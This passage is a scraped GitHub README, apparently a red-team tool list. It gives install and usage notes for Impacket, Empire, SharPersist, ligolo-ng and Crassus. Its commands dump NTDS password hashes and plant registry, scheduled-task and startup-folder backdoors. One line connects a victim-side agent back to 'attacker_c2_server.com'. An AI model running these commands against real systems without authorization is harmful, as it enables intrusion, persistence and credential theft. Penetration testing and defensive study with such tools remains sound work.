dir=\"auto\"\u003eImpacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 -m pip install impacket\"\u003e\u003cpre\u003epython3 -m pip install impacket\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (With 
Example Scripts)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDownload and extract \u003ca href=\"https://github.com/fortra/impacket\"\u003ethe package\u003c/a\u003e, then navigate to the install folder and run...\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 -m pip install .\"\u003e\u003cpre\u003epython3 -m pip install \u003cspan class=\"pl-c1\"\u003e.\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Extract NTLM hashes with local files\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n# Gets a list of the sessions opened at the remote hosts\nnetview.py domain/user:password -target 192.168.10.2\n\n# Retrieves the MSSQL instances names from the target host.\nmssqlinstance.py 192.168.1.2\n\n# This script will gather data about the domain's users and their corresponding email addresses.\nGetADUsers.py domain/user:password@IP\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Extract NTLM hashes with local files\u003c/span\u003e\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Gets a list of the sessions opened at the remote hosts\u003c/span\u003e\nnetview.py domain/user:password -target 192.168.10.2\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Retrieves the MSSQL instances names from the target host.\u003c/span\u003e\nmssqlinstance.py 192.168.1.2\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e 
This script will gather data about the domain's users and their corresponding email addresses.\u003c/span\u003e\nGetADUsers.py domain/user:password@IP\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eGreat \u003ca href=\"https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/\" rel=\"nofollow\"\u003echeat sheet\u003c/a\u003e for Impacket usage.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/EmpireProject/Empire\"\u003eEmpire\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-empire\" class=\"anchor\" aria-label=\"Permalink: 🔙Empire\" href=\"#empire\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eEmpire is a post-exploitation framework that allows you to generate 
payloads for establishing remote connections with victim systems.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOnce a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eEmpire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/EmpireProject/Empire\ncd Empire\nsudo ./setup/install.sh\"\u003e\u003cpre\u003egit clone https://github.com/EmpireProject/Empire\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Empire\nsudo ./setup/install.sh\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Start Empire\n./empire\n\n# List live agents\nlist agents\n\n# List live listeners\nlist listeners\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Start Empire\u003c/span\u003e\n./empire\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List live agents\u003c/span\u003e\nlist agents\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e List live listeners\u003c/span\u003e\nlist listeners\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice usage \u003ca href=\"https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf\"\u003echeat sheet\u003c/a\u003e by \u003ca 
href=\"https://github.com/HarmJ0y\"\u003eHarmJoy\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/mandiant/SharPersist\"\u003eSharPersist\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-sharpersist\" class=\"anchor\" aria-label=\"Permalink: 🔙SharPersist\" href=\"#sharpersist\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA Windows persistence toolkit written in C#.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe project has a \u003ca href=\"https://github.com/mandiant/SharPersist/wiki\"\u003ewiki\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Binary)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can find the most 
recent release \u003ca href=\"https://github.com/mandiant/SharPersist/releases\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eDownload the project files from the \u003ca href=\"https://github.com/mandiant/SharPersist\"\u003eGitHub Repo\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLoad the Visual Studio project up and go to \"Tools\" --\u0026gt; \"NuGet Package Manager\" --\u0026gt; \"Package Manager Settings\"\u003c/li\u003e\n\u003cli\u003eGo to \"NuGet Package Manager\" --\u0026gt; \"Package Sources\"\u003c/li\u003e\n\u003cli\u003eAdd a package source with the URL \"\u003ca href=\"https://api.nuget.org/v3/index.json\" rel=\"nofollow\"\u003ehttps://api.nuget.org/v3/index.json\u003c/a\u003e\"\u003c/li\u003e\n\u003cli\u003eInstall the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ccode\u003eInstall-Package Costura.Fody -Version 3.3.3\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eInstall the TaskScheduler package\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ccode\u003eInstall-Package TaskScheduler -Version 2.8.11\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eYou can now build the project yourself!\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eA full list of usage examples can be found \u003ca href=\"https://github.com/mandiant/SharPersist#adding-persistence-triggers-add\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"#KeePass\nSharPersist -t keepass -c \u0026quot;C:\\Windows\\System32\\cmd.exe\u0026quot; -a \u0026quot;/c 
calc.exe\u0026quot; -f \u0026quot;C:\\Users\\username\\AppData\\Roaming\\KeePass\\KeePass.config.xml\u0026quot; -m add \n\n#Registry\nSharPersist -t reg -c \u0026quot;C:\\Windows\\System32\\cmd.exe\u0026quot; -a \u0026quot;/c calc.exe\u0026quot; -k \u0026quot;hkcurun\u0026quot; -v \u0026quot;Test Stuff\u0026quot; -m add\n\n#Scheduled Task Backdoor\nSharPersist -t schtaskbackdoor -c \u0026quot;C:\\Windows\\System32\\cmd.exe\u0026quot; -a \u0026quot;/c calc.exe\u0026quot; -n \u0026quot;Something Cool\u0026quot; -m add\n\n#Startup Folder\nSharPersist -t startupfolder -c \u0026quot;C:\\Windows\\System32\\cmd.exe\u0026quot; -a \u0026quot;/c calc.exe\u0026quot; -f \u0026quot;Some File\u0026quot; -m add\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e#KeePass\nSharPersist -t keepass -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"C:\\Users\\username\\AppData\\Roaming\\KeePass\\KeePass.config.xml\" -m add \n\n#Registry\nSharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"hkcurun\" -v \"Test Stuff\" -m add\n\n#Scheduled Task Backdoor\nSharPersist -t schtaskbackdoor -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -n \"Something Cool\" -m add\n\n#Startup Folder\nSharPersist -t startupfolder -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"Some File\" -m add\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
href=\"https://github.com/nicocha30/ligolo-ng\"\u003eligolo-ng\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-ligolo-ng\" class=\"anchor\" aria-label=\"Permalink: 🔙ligolo-ng\" href=\"#ligolo-ng\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eLigolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eInstead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using \u003ca href=\"https://gvisor.dev/\" rel=\"nofollow\"\u003eGvisor\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eWhen running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Download)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003ePrecompiled binaries (Windows/Linux/macOS) are available on the \u003ca href=\"https://github.com/nicocha30/ligolo-ng/releases\"\u003eRelease page\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Build)\u003c/strong\u003e\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cem\u003eBuilding ligolo-ng (Go \u0026gt;= 1.17 is required):\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"go build -o agent cmd/agent/main.go\ngo build -o proxy cmd/proxy/main.go\n\n# Build for Windows\nGOOS=windows go build -o agent.exe cmd/agent/main.go\nGOOS=windows go build -o proxy.exe cmd/proxy/main.go\"\u003e\u003cpre\u003ego build -o agent cmd/agent/main.go\ngo build -o proxy cmd/proxy/main.go\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Build for Windows\u003c/span\u003e\nGOOS=windows go build -o agent.exe cmd/agent/main.go\nGOOS=windows go build -o proxy.exe cmd/proxy/main.go\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSetup: (Linux)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo ip tuntap add user [your_username] mode tun ligolo\nsudo ip link set ligolo up\"\u003e\u003cpre\u003esudo ip tuntap add user [your_username] mode tun ligolo\nsudo ip link \u003cspan class=\"pl-c1\"\u003eset\u003c/span\u003e ligolo up\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSetup: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou need to download the \u003ca href=\"https://www.wintun.net/\" rel=\"nofollow\"\u003eWintun\u003c/a\u003e driver (used by \u003ca href=\"https://www.wireguard.com/\" rel=\"nofollow\"\u003eWireGuard\u003c/a\u003e) and place the \u003ccode\u003ewintun.dll\u003c/code\u003e in the same folder as Ligolo (make sure you use the right architecture).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSetup: (Proxy server)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative 
overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./proxy -h # Help options\n./proxy -autocert # Automatically request LetsEncrypt certificates\"\u003e\u003cpre\u003e./proxy -h \u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Help options\u003c/span\u003e\n./proxy -autocert \u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Automatically request LetsEncrypt certificates\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eStart the agent on your target (victim) computer (no privileges are required!):\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./agent -connect attacker_c2_server.com:11601\"\u003e\u003cpre\u003e./agent -connect attacker_c2_server.com:11601\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA session should appear on the proxy server.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"INFO[0102] Agent joined. name=nchatelain@nworkstation remote=\u0026quot;XX.XX.XX.XX:38000\u0026quot;\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eINFO[0102] Agent joined. name=nchatelain@nworkstation remote=\"XX.XX.XX.XX:38000\"\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eUse the session command to select the agent.\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"ligolo-ng » session \n? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eligolo-ng » session \n? 
Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/nicocha30/ligolo-ng#using-ligolo-ng\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/nicocha30/ligolo-ng#demo\"\u003ehttps://github.com/nicocha30/ligolo-ng#demo\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003ePrivilege Escalation\u003c/h1\u003e\u003ca id=\"user-content-privilege-escalation\" class=\"anchor\" aria-label=\"Permalink: Privilege Escalation\" href=\"#privilege-escalation\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" 
dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/vu-ls/Crassus\"\u003eCrassus\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-crassus\" class=\"anchor\" aria-label=\"Permalink: 🔙Crassus\" href=\"#crassus\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\"Accenture made a tool called Spartacus, which finds DLL hijacking opportunities on Windows. Using Spartacus as a starting point, we created Crassus to extend Windows privilege escalation finding capabilities beyond simply looking for missing files. The ACLs used by files and directories of privileged processes can find more than just looking for missing files to achieve the goal.\" - \u003ca href=\"https://github.com/vu-ls/Crassus?tab=readme-ov-file#why-crassus\"\u003eLink\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Build)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCrassus was developed as a Visual Studio 2019 project. 
To build Crassus.exe:\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eOpen Crassus.sln\u003c/li\u003e\n\u003cli\u003ePress Ctrl+Shift+B on your keyboard\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (precompiled)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf you trust running other people's code without knowing what it does, Crassus.exe is \u003ca href=\"https://github.com/vu-ls/Crassus/blob/main/binaries/Crassus.exe\"\u003eprovided in this repository\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eIn \u003ca href=\"https://learn.microsoft.com/en-us/sysinternals/downloads/procmon\" rel=\"nofollow\"\u003eProcess Monitor\u003c/a\u003e, select the \u003ccode\u003eEnable Boot Logging\u003c/code\u003e option.\u003c/li\u003e\n\u003cli\u003eReboot.\u003c/li\u003e\n\u003cli\u003eOnce you have logged in and Windows has settled, optionally also run \u003ca href=\"https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c\"\u003escheduled tasks that may be configured to run with privileges\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eRun Process Monitor once again.\u003c/li\u003e\n\u003cli\u003eWhen prompted, save the boot log.\u003c/li\u003e\n\u003cli\u003eReset the default Process Monitor filter using \u003ccode\u003eCtrl-R\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eSave this log file, e.g., to \u003ccode\u003eboot.PML\u003c/code\u003e. 
The reason for re-saving the log file is twofold:\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eOlder versions of Process Monitor do not save boot logs as a single file.\u003c/li\u003e\n\u003cli\u003eBoot logs by default will be unfiltered, which may contain extra noise, such as a local-user DLL hijacking in the launching of Process Monitor itself.\u003c/li\u003e\n\u003c/ol\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172646-0194b7bf-80ee-44cd-a576-22bc6888de8a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjQ2LTAxOTRiN2JmLTgwZWUtNDRjZC1hNTc2LTIyYmM2ODg4ZGU4YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0zNmY2NWE5NDFkZWFmMzE3MDZkZGRkNmQxYWIyMGM1NjdlNmNjNGY2Mzc2YmFiNjA5ZTExNWNhYzg2ZWIwZDUzJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.EGDAx0wtQmsqUle54CyBQwSVcGBTbhxv7hMvVTuuR14\"\u003e\u003cimg 
